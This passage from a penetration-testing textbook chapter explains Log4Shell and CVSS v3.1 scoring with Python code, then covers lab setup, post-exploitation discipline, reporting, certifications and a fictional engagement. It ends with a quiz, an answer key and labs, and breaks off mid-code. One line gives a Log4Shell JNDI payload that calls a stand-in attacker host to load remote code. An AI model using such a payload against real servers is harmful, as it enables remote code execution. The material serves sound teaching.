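Note that the parsed tuple carries no severity information, which is the point made above: the name identifies the flaw and nothing more.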
The weakness class is captured by CWE: Log4Shell is fundamentally an injection flaw (related to
CWE-502, deserialization of untrusted data, and improper input handling). The mechanism is striking in
its simplicity. Log4j supported a “message lookup” feature that interpreted special syntax in logged
strings, including a Java Naming and Directory Interface (JNDI) lookup. An attacker who could get the
application to log an attacker-controlled string such as ${jndi:ldap://evil.example/x} could make the
server reach out to a hostile LDAP server and load and execute remote Java code, achieving remote code
execution. The terrifying part was the trigger: merely logging a value an attacker controlled, for example
a crafted HTTP User-Agent header or a chat message, was enough, which is why it spread so fast.
The severity is quantified by CVSS. Log4Shell carries the maximum CVSS v3.1 base score of 10.0
(Critical), with the vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H. Reading that vector
explains the score: the attack is over the Network (AV:N), of Low complexity (AC:L), needs No
privileges (PR:N) and No user interaction (UI:N), Changes scope beyond the vulnerable component
(S:C), and yields High impact to Confidentiality, Integrity, and Availability. Every metric
is at its worst, which is exactly what produces a perfect 10.0. The remediation was to upgrade Log4j (to
2.17.1 and later, after follow-on fixes), disable the lookup feature, or remove the vulnerable class. The
worked code below maps base scores to severity bands, contrasts Log4Shell with two less severe CVEs, and decodes the Log4Shell vector metric by metric.
# Chapter 6 -- Reading CVSS v3.1 vectors and comparing three real CVEs (illustrative)
def band(score):
    """Map a CVSS base score to its qualitative severity band."""
    if score == 0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"

# Real, published examples (base scores as recorded by NVD)
cves = [
    ("CVE-2021-44228", "Log4Shell (Apache Log4j RCE via JNDI)",
     "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", 10.0),
    ("CVE-2014-0160", "Heartbleed (OpenSSL memory over-read)",
     "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 7.5),
    ("CVE-2017-0144", "EternalBlue (SMBv1 RCE, basis of WannaCry)",
     "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", 8.1),
]
print(f"{'CVE ID':16} {'Score':>5} {'Severity':9} Description")
print("-"*92)
for cid, desc, vector, score in cves:
    print(f"{cid:16} {score:>5} {band(score):9} {desc}")
print()

# Decode the Log4Shell vector metric-by-metric
labels = {"AV":"Attack Vector","AC":"Attack Complexity","PR":"Privileges Required",
          "UI":"User Interaction","S":"Scope","C":"Confidentiality","I":"Integrity","A":"Availability"}
vec = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
print("Decoding", vec, "(Log4Shell):")
for part in vec.split("/")[1:]:  # skip the leading "CVSS:3.1" version prefix
    k, v = part.split(":")
    print(f" {labels.get(k,k):20}: {v}")
print("\nEvery metric at its worst -> base score 10.0 (Critical).")
CVE ID           Score Severity  Description
--------------------------------------------------------------------------------------------
CVE-2021-44228    10.0 Critical  Log4Shell (Apache Log4j RCE via JNDI)
CVE-2014-0160      7.5 High      Heartbleed (OpenSSL memory over-read)
CVE-2017-0144      8.1 High      EternalBlue (SMBv1 RCE, basis of WannaCry)

Decoding CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (Log4Shell):
 Attack Vector       : N
 Attack Complexity   : L
 Privileges Required : N
 User Interaction    : N
 Scope               : C
 Confidentiality     : H
 Integrity           : H
 Availability        : H

Every metric at its worst -> base score 10.0 (Critical).
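The base scores in the example above were entered by hand. As a sketch of where such numbers come from, the following reimplements the CVSS v3.1 base-score equations and metric weights as published in the FIRST specification. The function names `roundup` and `base_score` are this example's own, only base metrics are handled, and an authoritative calculator should be used for real scoring.

```python
import math

# Metric weights from the CVSS v3.1 specification (base metrics only).
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.20}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
# Privileges Required is weighted differently when scope changes.
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.50}


def roundup(value: float) -> float:
    """Round up to one decimal place, following the v3.1 Roundup definition."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the CVSS v3.1 base score from a base vector string."""
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    changed = metrics["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[metrics["PR"]]
    iss = 1 - ((1 - CIA[metrics["C"]]) * (1 - CIA[metrics["I"]]) * (1 - CIA[metrics["A"]]))
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = 8.22 * AV[metrics["AV"]] * AC[metrics["AC"]] * pr * UI[metrics["UI"]]
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if changed:
        total *= 1.08  # scope change amplifies the combined score
    return roundup(min(total, 10))


if __name__ == "__main__":
    for vec in ("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"):
        print(vec, "->", base_score(vec))
```

Run against the three vectors from the example, the computed values agree with the recorded scores of 10.0, 7.5, and 8.1, which shows that the vector string fully determines the base score.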
Current News: legal protection for good-faith security research
In a significant shift for ethical hackers, the U.S. Department of Justice revised its policy for charging Computer Fraud and Abuse Act cases to direct that good-faith security research should not be charged. The policy (announced in May 2022, with subsequent guidance referenced into 2025) defines good-faith security research as accessing a computer solely to test, investigate, or correct a security flaw in a manner designed to avoid harm and where findings are used primarily to improve security. Crucially, the policy is not a blank check: claiming “research” while extorting a device’s owner, or otherwise acting in bad faith, remains chargeable. Combined with the Supreme Court’s narrowing of “exceeds authorized access” in Van Buren v. United States (2021), the legal environment for legitimate researchers and bug-bounty participants has become meaningfully clearer, though researchers should still obtain authorization, follow program rules, and consult counsel for anything ambiguous. (Details per Department of Justice announcements and legal analyses; verify current policy before relying on it.)
6.11 The Test Environment and Toolkit#
A professional needs a reliable, well-managed platform from which to test, and building one correctly is itself part of safe practice. Penetration testers commonly work from a purpose-built Linux distribution that bundles hundreds of security tools; the historically important BackTrack distribution evolved into today’s Kali Linux, and Parrot OS is a popular alternative. Such a distribution provides, out of the box, the scanners, exploitation frameworks, and password tools used throughout this book, including Nmap, Metasploit, Wireshark, Aircrack-ng, John the Ripper, and Hashcat (cataloged in Appendix A). Commercial platforms such as Core Impact and Cobalt Strike, and scanners such as Nessus and Nexpose, complement the open-source toolkit.
Building and running the test system demands its own discipline. The platform should be deliberately chosen (a virtual machine for easy snapshotting and redeployment, or bare metal for performance and hardware access), and tools should be verified by hash against trusted sources, since a tampered tool can compromise the tester. Anti-virus and host firewalls may interfere with security tools and are managed carefully in an isolated environment, never by recklessly disabling protection on a machine exposed to the internet. During engagements, professionals use a fresh build for each test, never browse the web or handle personal data on the test system, run a packet capture to record activity, keep meticulous time-stamped operational notes (the basis of the eventual report and of any legal defense), and encrypt all collected and exfiltrated data, which will contain passwords, hashes, and vulnerability details. They also watch their own systems for “attack-backs” and resource exhaustion.
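Hash verification of a downloaded tool can be sketched in a few lines. This is a minimal illustration using Python's standard `hashlib`; the helper names `sha256_of` and `verify_download` are hypothetical, and the published digest is assumed to come from the tool's official site over a trusted channel.

```python
import hashlib
import hmac
from pathlib import Path


def sha256_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Return the hex SHA-256 digest of a file, read in chunks to bound memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_download(path: Path, published_hex: str) -> bool:
    """Compare the computed digest with the value published by the tool's source."""
    return hmac.compare_digest(sha256_of(path), published_hex.strip().lower())
```

A mismatch means the file is not the one the publisher released, whether through corruption or tampering, and it should not be installed on the test system.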
In-Class Exercise: stand up a safe lab
In groups, design (and, if resources permit, build) an isolated penetration-testing lab using virtualization software such as VirtualBox or VMware. Include one attacker virtual machine (Kali or Parrot OS) and one or more deliberately vulnerable targets (for example Metasploitable or a vulnerable web app such as DVWA), connected on a host-only network with no route to the internet or any production system. Document the network diagram, verify the tools’ download hashes, and write a one-paragraph “rules of engagement” for your own lab. Explain why isolation and hash verification matter. Do all testing only within this lab.
A note on tooling philosophy reinforces the chapter’s discipline. Tools are force multipliers, not substitutes for understanding: a tester who runs a scanner without grasping what it does will misread its output, miss what it cannot see, and may cause harm. Automated tools (scanners, exploitation frameworks) excel at breadth and repetition, while manual testing finds the logic flaws and chained attacks that automation misses, so professional engagements blend both. Equally, testers must understand their tools’ footprint: an aggressive scan can disrupt fragile systems, and some exploits can crash their targets, which is exactly why the rules of engagement specify what is permitted and why testers validate tools in a lab before pointing them at a client. The maxim is that the tester, not the tool, is responsible for every packet sent.
6.12 Threat Modeling and Intelligence in the Engagement#
Between scoping and active testing, professional engagements pause to think like the specific adversary the client fears, which is why PTES places threat modeling as its own phase. Drawing on the methods of Chapter 5 (STRIDE, attack trees, and the MITRE ATT&CK knowledge base), the tester uses the intelligence gathered in reconnaissance to model who would realistically attack this organization, what they would want, and which paths they would take, then prioritizes testing effort accordingly. A bank’s testers focus on paths to financial systems and customer data; a hospital’s on paths to patient records and life-critical devices; a manufacturer’s on intellectual property and operational technology. This adversary-centric prioritization is what makes a time-bounded test efficient: rather than testing everything shallowly, the team concentrates on the attack paths that matter most to this client’s risk profile, ensuring the engagement’s limited hours buy the most relevant assurance. Threat modeling thus links the offensive work of Part III directly back to the risk management of Chapter 5, and it is the bridge between knowing the target (reconnaissance, Chapter 7) and attacking it (Chapters 8 and 9).
6.13 Post-Exploitation, Pivoting, and Operational Discipline#
Gaining access is rarely the end of a test; what an attacker can do after the initial compromise is what truly measures risk, so post-exploitation is a phase in its own right (developed technically in Chapter 9). After the initial foothold, the tester assesses the value of what was reached, attempts privilege escalation to gain administrative or root control, and performs pivoting (also called lateral movement), using the compromised host as a stepping stone to reach systems that were not directly accessible. The goal is to demonstrate realistic business impact: not merely “a web server was vulnerable,” but “from that web server an attacker could reach the domain controller and the customer database.” A well-documented critical path, recording each host, the technique used, and whether it succeeded, turns abstract vulnerabilities into a concrete attack narrative that decision-makers understand.
This phase demands the strictest operational discipline, because the tester is now deep inside live systems. Professionals keep meticulous, time-stamped operational notes (the basis of the report and of any later dispute), run packet captures of their own activity, and encrypt all data they collect or exfiltrate, since it will contain passwords, hashes, and sensitive records. They coordinate continuously with the client’s monitor through daily start-and-end briefings, and they practice deconfliction, so that if the blue team detects suspicious activity, the monitor can confirm whether it is the test or a real attacker. They watch their own systems for “attack-backs” and resource exhaustion, maintain an agreed-upon exemption list to avoid being auto-shunned into a self-inflicted denial of service, and, when the test concludes, remove their artifacts (backdoors, test accounts, uploaded tools) and assist with restoration as the rules of engagement require. This discipline is what keeps an aggressive test safe, attributable, and professional.
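The time-stamped notes and the documented critical path described above can share one record format. The sketch below is an assumption-laden illustration: the `PathStep` class and its fields are hypothetical, chosen to capture the host, the technique used, and whether it succeeded.

```python
from dataclasses import dataclass, field
from datetime import datetime, timezone


@dataclass(frozen=True)
class PathStep:
    """One operational note: where, how, when, and whether it worked."""
    host: str
    technique: str
    succeeded: bool
    # Default to the current time in UTC so notes from different testers line up.
    timestamp: datetime = field(default_factory=lambda: datetime.now(timezone.utc))

    def as_line(self) -> str:
        outcome = "OK" if self.succeeded else "FAILED"
        stamp = self.timestamp.isoformat(timespec="seconds")
        return f"{stamp} {self.host} {self.technique} [{outcome}]"


def critical_path(steps: list[PathStep]) -> list[str]:
    """Return the hosts of successful steps in chronological order."""
    ordered = sorted(steps, key=lambda step: step.timestamp)
    return [step.host for step in ordered if step.succeeded]
```

Recording failures as well as successes matters: the failed attempts show the client which controls held, and they help the monitor deconflict test traffic from a real attack.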
Going Deeper (graduate/research): automation, AI, and the future of the discipline
Penetration testing is being reshaped by automation and artificial intelligence on both sides. Automated breach-and-attack-simulation platforms continuously exercise an environment against known techniques, and AI assistants increasingly help with reconnaissance synthesis, payload generation, and report drafting, compressing work that once took days. At the same time, attackers use the same tools, accelerating vulnerability discovery and crafting more convincing social-engineering lures (Chapter 4). These shifts do not eliminate the human tester; they raise the bar for what humans contribute, namely the creativity to chain unexpected flaws, the business judgment to assess real impact, and the ethical and legal discernment that no tool possesses. The research frontier includes autonomous exploitation agents, machine-assisted triage of findings, and the defensive challenge of testing AI systems themselves (prompt injection, model extraction, and data poisoning, revisited in Chapter 17). The enduring lesson is that tooling changes constantly while the methodology, ethics, and legal discipline of this chapter remain the stable foundation on which any technique, automated or manual, must rest.
6.14 Compliance-Driven and Standards-Based Testing#
Much real-world testing is mandated rather than discretionary, so professionals must know which obligations require it. The Payment Card Industry Data Security Standard (PCI DSS) explicitly requires regular penetration testing of the cardholder data environment (its Requirement 11 family), including after significant changes, and requires that the test validate segmentation. Sector regulations drive testing too: the Health Insurance Portability and Accountability Act (HIPAA) Security Rule requires periodic technical evaluation of safeguards; financial regulations and frameworks expect regular assessment; and government systems undergo assessment as part of the NIST Risk Management Framework’s Assess step (Chapter 5). Standards such as ISO/IEC 27001 expect technical vulnerability management and testing as part of the information security management system.
Compliance-driven testing carries distinctive requirements. The scope is often defined by the regulation (for example, everything that stores, processes, or transmits cardholder data), the frequency is mandated (commonly annually and after major changes), and the report must satisfy an auditor as well as the technical team, with explicit attestations and evidence. As Chapter 5 stressed, compliance is a floor, not a ceiling: a test scoped only to satisfy a checklist may miss risks outside the regulated boundary, so mature organizations treat the mandated test as a baseline and pursue broader, risk-driven testing beyond it. Understanding the compliance context is part of scoping, because it determines what must be tested, how often, and how the results must be documented.
6.15 Reporting#
The deliverable that gives a penetration test its value is not the access achieved but the report, because findings that are not communicated clearly cannot be remediated. Throughout the engagement the tester stays in close contact with the client’s monitor, so that the final report contains no surprises; serious issues are discussed as they are found, and a critical vulnerability triggers an immediate pause and notification rather than waiting for the written report. A complete report is comprehensive and self-contained, typically including an introduction, a statement of the work performed, the results and conclusions, and recommendations.
The most important quality of a good report is that its findings are ranked by risk, from highest to lowest, so that the client can address the most dangerous issues first, connecting the test directly to the risk-prioritization logic of Chapter 5. Each finding should describe the vulnerability, demonstrate its impact (often with evidence from the test), assess the risk it poses, and give concrete, actionable remediation guidance. The report is written for two audiences at once: an executive summary conveys business impact and overall posture to decision-makers in non-technical terms, while the technical detail gives administrators what they need to reproduce and fix each issue. Because the report catalogs exactly how to compromise the client, it is extremely sensitive: it must be encrypted in storage and transit, marked confidential, and, by common practice, destroyed by the consultant after a contractually defined period. Finally, good engagements include a post-assessment debrief and, ideally, a retest after remediation to confirm that the fixes work, closing the loop between offense and defense that this chapter opened.
Knowledge Check
(1) Why does a penetration-test report contain both an executive summary and detailed technical findings?
(2) What is the purpose of a retest after remediation?
Answers: (1) The two serve different audiences: the executive summary conveys business impact and posture to decision-makers in non-technical language, while the technical detail gives administrators what they need to reproduce and fix each issue. (2) A retest verifies that the client’s remediation actually closed the vulnerabilities, confirming the fixes work and closing the offense-to-defense loop.
Because the report is the product, its structure rewards attention. A strong report typically opens with an executive summary (the business-level story: overall posture, the most serious risks, and their potential impact, in plain language), followed by a methodology and scope statement (what was tested, how, and when, so the reader knows the boundaries), then the detailed findings (each with a description, affected assets, evidence and reproduction steps, a severity rating such as CVSS, and specific remediation guidance), and finally strategic recommendations and appendices (raw data, tool output, and the operational notes). Findings are ordered by risk so that scarce remediation effort addresses the most dangerous issues first. Good reports also distinguish tactical fixes (patch this server) from strategic ones (improve the patch-management process that left it vulnerable), helping the client address root causes rather than only symptoms. Many engagements also track metrics over time (the number and severity of findings across successive tests) to show whether the security program is improving, which connects the report back to the key performance indicators of Chapter 5.
# Chapter 6 -- Ranking findings: a simplified CVSS-style base score
# Real CVSS v3.1 is more detailed; this illustrates how findings are prioritized for the report.
def severity_band(score):
    """Map a 0-10 score to its qualitative severity band."""
    if score == 0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"

# Illustrative findings with rough base scores (0-10)
findings = [
    ("Unauthenticated RCE on internet-facing server", 9.8),
    ("SQL injection in login form", 8.6),
    ("Reflected XSS in search box", 6.1),
    ("Missing security headers", 3.7),
    ("Verbose error messages", 2.4),
]
print(f"{'Finding':48} {'Score':>5} Severity (remediate top-down)")
print("-"*78)
# Sort by descending score so the most dangerous finding is listed first
for name, score in sorted(findings, key=lambda x: -x[1]):
    print(f"{name:48} {score:>5} {severity_band(score)}")
print("\nReports rank findings by risk so clients fix the most dangerous issues first (Ch.5 logic).")
Finding                                          Score Severity (remediate top-down)
------------------------------------------------------------------------------
Unauthenticated RCE on internet-facing server      9.8 Critical
SQL injection in login form                        8.6 High
Reflected XSS in search box                        6.1 Medium
Missing security headers                           3.7 Low
Verbose error messages                             2.4 Low

Reports rank findings by risk so clients fix the most dangerous issues first (Ch.5 logic).
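The trend metrics mentioned earlier, the number and severity of findings across successive tests, can be tallied the same way. This is a minimal sketch with hypothetical helper names (`severity_counts`, `trend`); it assumes each test is summarized as a list of base scores.

```python
from collections import Counter

BANDS = ("Critical", "High", "Medium", "Low", "None")


def severity_band(score: float) -> str:
    """Same qualitative bands as the ranking example."""
    if score == 0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"


def severity_counts(scores: list[float]) -> Counter:
    """Count findings per severity band for one test."""
    return Counter(severity_band(score) for score in scores)


def trend(previous: list[float], current: list[float]) -> dict[str, int]:
    """Change in finding count per band; negative means fewer findings."""
    before, after = severity_counts(previous), severity_counts(current)
    return {band: after[band] - before[band] for band in BANDS}


if __name__ == "__main__":
    last_year = [9.8, 8.6, 6.1, 3.7, 2.4]  # illustrative scores from the table
    this_year = [6.1, 3.7]                 # hypothetical retest results
    print(trend(last_year, this_year))
```

A falling count in the Critical and High bands is the signal a security program wants, though a raw count says nothing about changes in scope between tests, so the two reports should cover comparable ground.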
6.16 Professional Certifications for Penetration Testers#
Because the field rewards demonstrated skill, a recognized set of certifications signals competence to employers and clients, and knowing the landscape helps learners chart a path. The most respected hands-on credential is the Offensive Security Certified Professional (OSCP), whose grueling 24-hour practical exam requires actually compromising machines and writing a professional report, making it a strong proxy for real ability. The EC-Council’s Certified Ethical Hacker (CEH) is widely requested in job postings and emphasizes broad methodology knowledge (and maps to this book via Appendix C). The SANS-affiliated GIAC Penetration Tester (GPEN) and GIAC Web Application Penetration Tester (GWAPT) are rigorous, training-backed credentials, and newer practical certifications such as the Practical Network Penetration Tester (PNPT) emphasize realistic, report-driven assessment including Active Directory and social engineering. Higher-level and specialized options include Offensive Security’s advanced tracks and red-team certifications.
These credentials differ in emphasis (hands-on exploitation for OSCP and PNPT, broad knowledge for CEH, training depth for GPEN), but all reinforce the same professional foundation this chapter describes: methodology, authorization, ethics, and reporting. For learners using this textbook, the offensive chapters (7 through 10) build the technical skills these certifications test, while this chapter supplies the methodological and legal-ethical framing that distinguishes a certified professional from someone who merely knows some tools.
6.17 An End-to-End Engagement, Start to Finish#
To consolidate the chapter, consider a complete engagement for a fictional retailer, “Harbor Goods,” following the process from first contact to final retest. It begins with pre-engagement: Harbor Goods, driven by a PCI DSS obligation and a recent industry breach, requests an external and web-application test. The parties agree on the scope (the e-commerce site and its supporting servers, explicitly excluding the third-party payment processor), the knowledge level (gray-box, with a test account provided), permitted vectors (no denial-of-service, social engineering out of scope), the testing window, the testers’ source IP addresses, and a single client monitor empowered to halt the test. All of this is captured in a signed rules-of-engagement document with approval signatures, the authorization that makes everything lawful.
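Scope terms like these can also be encoded so that tooling refuses out-of-scope targets. The following is a minimal sketch, not a standard format: the `Scope` fields and the `is_authorized` helper are hypothetical, and the addresses in the usage note come from the reserved documentation ranges rather than any real network.

```python
import ipaddress
from dataclasses import dataclass
from datetime import datetime


@dataclass(frozen=True)
class Scope:
    """Machine-readable slice of a rules-of-engagement document (hypothetical fields)."""
    in_scope: tuple[str, ...]   # networks the client authorized
    excluded: tuple[str, ...]   # explicit carve-outs, e.g. a third-party processor
    window_start: datetime      # agreed testing window
    window_end: datetime


def is_authorized(target_ip: str, when: datetime, scope: Scope) -> bool:
    """True only if the target is in scope, not excluded, and inside the window."""
    address = ipaddress.ip_address(target_ip)
    if not (scope.window_start <= when <= scope.window_end):
        return False
    # Exclusions win over inclusions, so a carve-out inside a larger range holds.
    if any(address in ipaddress.ip_network(net) for net in scope.excluded):
        return False
    return any(address in ipaddress.ip_network(net) for net in scope.in_scope)
```

For example, with `in_scope=("203.0.113.0/24",)` and `excluded=("203.0.113.50/32",)`, the host 203.0.113.10 is authorized during the window while 203.0.113.50 never is. A check like this supplements the signed document; it does not replace it.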
Active work then follows the phases. In reconnaissance (Chapter 7) the testers map Harbor Goods’ public footprint; in scanning (Chapter 8) they enumerate hosts, ports, and services and identify a vulnerable web component; in gaining access (Chapter 9) they exploit a SQL-injection flaw in the login form to retrieve credentials; and in post-exploitation they escalate to an administrative account and pivot to an internal server holding order data, demonstrating that the single web flaw leads to a significant data-exposure path. Throughout, they keep time-stamped operational notes, encrypt collected data, brief the monitor daily, and, on discovering that customer data is reachable, immediately notify the client rather than waiting for the report.
The engagement closes with reporting and remediation. The testers deliver a risk-ranked report whose executive summary explains the business impact (the path from public website to customer data) and whose technical sections give administrators reproduction steps and concrete fixes, with each finding scored by CVSS. They conduct a one-hour debrief, assist in removing their test artifacts, and, after Harbor Goods remediates, perform a retest confirming the SQL-injection flaw and the escalation path are closed. The findings flow into Harbor Goods’ risk register (Chapter 5), and the detection gaps observed inform the blue team (Chapter 12). This single arc demonstrates every concept of the chapter (authorization, methodology, scope, ethics, operational discipline, disclosure, and reporting) working together to convert an authorized attack into measurable security improvement.
6.18 Limitations, Pitfalls, and Misconceptions#
A professional must be candid about what penetration testing cannot do, because overstating its assurance is itself a risk. A test is a snapshot in time: it reflects the systems, configurations, and tester knowledge of a particular window, and a change the next day can introduce a vulnerability the test never saw. It is scope-bounded: anything excluded from the rules of engagement is, by definition, untested, so a clean report covers only what was in scope. It is time- and skill-bounded: real adversaries face no deadline and may be more capable than the testers, so “we did not find a way in” is not “no way in exists.” And it can produce false negatives (missed real vulnerabilities) and false positives (flagged issues that are not exploitable), which is why findings are validated and why automated output is never reported uncritically.
Several recurring pitfalls undermine engagements. Scope creep expands testing into unauthorized territory, creating legal exposure. Inadequate authorization, beginning work before signed permission from someone empowered to grant it, is the cardinal error. Causing unintended damage through aggressive testing without agreed limits can harm the client’s operations and the tester’s reputation. Poor communication, surprising the client with findings or failing to escalate a critical issue immediately, breaches professional duty. Weak reporting that is not risk-ranked or actionable wastes the engagement’s value. And treating compliance as the goal rather than security produces tests scoped only to pass an audit while real risks go unexamined. The remedy for all of these is the discipline this chapter has built: explicit authorization, careful scoping, constant communication, ethical restraint, and a clear, risk-driven report. Understanding the limits is not a weakness of penetration testing but a mark of the professional who uses it correctly, as one valuable input to the continuous risk management of Chapter 5 rather than a one-time guarantee of security.
Chapter Summary#
This chapter opened offensive security by establishing the discipline that makes hacking lawful and useful. A penetration test is an authorized attack that exploits vulnerabilities to validate their severity, distinct from a vulnerability assessment (find and rank, no exploitation) and a red-team engagement (adversary emulation testing detection). Actors are classified by hats (white, gray, black, by authorization and intent) and team colors (red, blue, purple), and engagements by knowledge level (black-, gray-, and crystal/white-box). Tests follow a consistent set of phases (reconnaissance, scanning, gaining access, escalation, maintaining access, and post-exploitation validation and cleanup, plus, for the ethical tester, permission and reporting), codified by methodologies such as PTES, NIST SP 800-115, and OSSTMM. The most important phase is pre-engagement scoping and the rules of engagement, the document that authorizes and bounds the work and prevents real harm. The legal framework (the CFAA and related statutes, narrowed by Van Buren) and professional ethics make authorization and the client’s welfare paramount, while coordinated vulnerability disclosure and bug bounties, now supported by DOJ good-faith-research policy, govern findings made outside a contract. Testers work from managed platforms like Kali Linux under strict operational discipline, and the engagement’s value is delivered through a risk-ranked report and retest. With the methodology, law, and ethics in place, the next chapter begins the technical work with reconnaissance, the first phase of every engagement.
Why This Matters#
Penetration testing is where the offensive and defensive halves of this book meet. It is the disciplined practice of thinking like the attackers of Chapter 1, using the techniques of Chapters 7 through 10, in order to feed the risk management of Chapter 5 and strengthen the defenses of Chapters 11 and 12. What makes it a profession rather than a crime is everything this chapter emphasized around the technical skills: a repeatable methodology, a carefully scoped and signed rules-of-engagement document, a firm grasp of the law, an ethical commitment to the client’s welfare, responsible disclosure of what is found, and a clear, risk-ranked report that drives remediation. A brilliant exploit delivered without authorization is a felony; the same exploit delivered within these structures is a valuable service. Mastering the methodology and its surrounding discipline is therefore the prerequisite for everything that follows, and it is what employers and certifications from CEH to OSCP ultimately test.
Review Questions (MCQ)
Q1. The single factor that distinguishes a penetration test from a crime is:
A. The tools used
B. Authorization
C. The operating system
D. The attacker’s skill
Q2. A vulnerability assessment differs from a penetration test in that it usually:
A. Exploits every flaw
B. Identifies and ranks flaws without exploiting them
C. Is illegal
D. Needs no scope
Q3. A hacker who acts without authorization but without malicious intent is a:
A. White hat
B. Gray hat
C. Black hat
D. Red hat
Q4. Testing with full knowledge of the target (source code, architecture) is called:
A. Black-box
B. Gray-box
C. White-box (crystal-box)
D. Blind
Q5. The purple team’s role is to:
A. Attack only
B. Defend only
C. Have red and blue collaborate to improve detection
D. Audit policy
Q6. The most important pre-engagement document, which authorizes and bounds the test, is the:
A. Final report
B. Rules of engagement
C. Invoice
D. CVE entry
Q7. Which methodology defines seven phases including pre-engagement, threat modeling, exploitation, and reporting?
A. OWASP
B. PTES
C. ISO 9001
D. COBIT
Q8. The principal U.S. anti-hacking statute is the:
A. DMCA
B. HIPAA
C. CFAA (18 U.S.C. 1030)
D. GDPR
Q9. Van Buren v. United States (2021) is significant because it:
A. Banned bug bounties
B. Narrowed “exceeds authorized access” under the CFAA
C. Legalized all hacking
D. Created the CVE system
Q10. Reporting a flaw privately to the vendor and allowing time to fix before publishing is:
A. Full disclosure
B. Non-disclosure
C. Responsible/coordinated disclosure
D. Zero-day sale
Q11. During a test, discovering a critical vulnerability should prompt the tester to:
A. Keep testing quietly
B. Publish it immediately
C. Stop and immediately notify the client
D. Exploit it fully
Q12. Scope creep refers to:
A. Slow scanners
B. Testing expanding beyond what was authorized
C. A type of malware
D. A reporting format
Q13. Kali Linux is the modern successor to which testing distribution?
A. Ubuntu
B. BackTrack
C. Windows
D. Red Hat
Q14. A penetration-test report’s findings should be ordered:
A. Alphabetically
B. By discovery time
C. Ranked by risk, highest first
D. Randomly
Q15. Good-faith security research under recent DOJ policy must:
A. Be done for profit
B. Avoid harm and aim to improve security, not extort
C. Skip authorization
D. Always be published immediately
Answer Key
1: B 2: B 3: B 4: C 5: C 6: B 7: B 8: C 9: B 10: C 11: C 12: B 13: B 14: C 15: B
Lab Assignment
Lab 6.1 (beginner) - Write rules of engagement. For a fictional client, draft a one-to-two page RoE including concept of operations, scope (in- and out-of-scope targets), permitted attack vectors, the client monitor and contact procedure, handling of critical findings, data handling, and approval signatures. Identify three things that, if omitted, could cause legal or operational harm.
Lab 6.2 (beginner/intermediate) - Classify the engagement. Given three short scenarios (an external test of a public website with no information provided; an assessment of an internal app with user credentials supplied; a source-code-assisted review), classify each by knowledge level and team type, and justify which methodology phase the work begins in.
Lab 6.3 (intermediate) - Build a lab and run the full process. Using the Section 6.11 exercise lab, take one vulnerable target through the phases (recon, scan, gain access) and keep time-stamped operational notes. Produce a short risk-ranked report with an executive summary and one detailed finding, applying the CVSS-style scoring from this chapter.
Lab 6.4 (advanced/research) - Disclosure and the law. Choose a real public bug-bounty or vulnerability disclosure program and summarize its safe-harbor terms, scope, and rules. Then write a short memo explaining, with reference to the CFAA, Van Buren, and DOJ good-faith-research policy, why participating within those terms is lawful and what actions would fall outside protection.
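As a starting point for Labs 6.1 and 6.3, two of the mechanical checks they rely on can be sketched in a few lines of Python: confirming that a target falls inside the signed scope, and ordering findings by risk, highest first. This is a minimal illustration under stated assumptions, not the chapter's prescribed tooling. The address ranges are reserved documentation networks standing in for a fictional client; the names `IN_SCOPE`, `OUT_OF_SCOPE`, `is_in_scope`, `Finding`, and `rank_findings` are hypothetical; and the CVSS base scores are assumed to have been assigned by the tester beforehand. The severity bands follow the qualitative rating scale in the CVSS v3.1 specification.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Hypothetical RoE scope for a fictional client (reserved documentation ranges).
IN_SCOPE = [ip_network("192.0.2.0/24")]
OUT_OF_SCOPE = [ip_network("192.0.2.128/25")]  # assumed exclusion, e.g. a fragile segment


def is_in_scope(target: str) -> bool:
    """Return True only if target is in an in-scope range and not explicitly excluded."""
    addr = ip_address(target)
    if any(addr in net for net in OUT_OF_SCOPE):
        return False  # exclusions take precedence over inclusions
    return any(addr in net for net in IN_SCOPE)


def severity(score: float) -> str:
    """Map a CVSS v3.1 base score to its qualitative severity rating."""
    if score == 0.0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"


@dataclass
class Finding:
    title: str
    host: str
    cvss: float  # base score assigned by the tester, 0.0 to 10.0


def rank_findings(findings):
    """Return findings sorted by CVSS base score, highest first.

    Raises ValueError if any finding refers to a host outside the scope,
    because that would indicate testing beyond what was authorized.
    """
    for f in findings:
        if not is_in_scope(f.host):
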